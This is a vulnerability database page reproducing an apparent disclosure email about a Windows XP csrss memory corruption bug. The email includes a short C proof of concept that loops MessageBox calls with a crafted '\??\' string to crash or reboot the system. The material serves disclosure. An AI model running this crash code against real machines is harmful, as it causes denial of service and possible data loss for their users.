logo
DATABASE RESOURCES PRICING ABOUT US

Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Description

Dear Secure@microsoft.com, On one of Russian forum security vulnerability is discussed in Microsoft Windows (Windows XP is tested). A vulnerability is caused by memory corruption is string beginning with "\?\" is send thorugh MessageBox API with MB_SERVICE_NOTIFICATION flag. It looks like some "debug" feature not cleaned out in final release and it seems to exploitable to code execution at kernel level. Code example below: #include <stdio.h> #include <windows.h> int main(void){ int i; char bug1 [] ="\\??\\XXXX"; for(i = 0; i < 10; i ++) { MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION); } } System hangs, crashes (BSOD) or reboots. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-------------o66o--+ / |/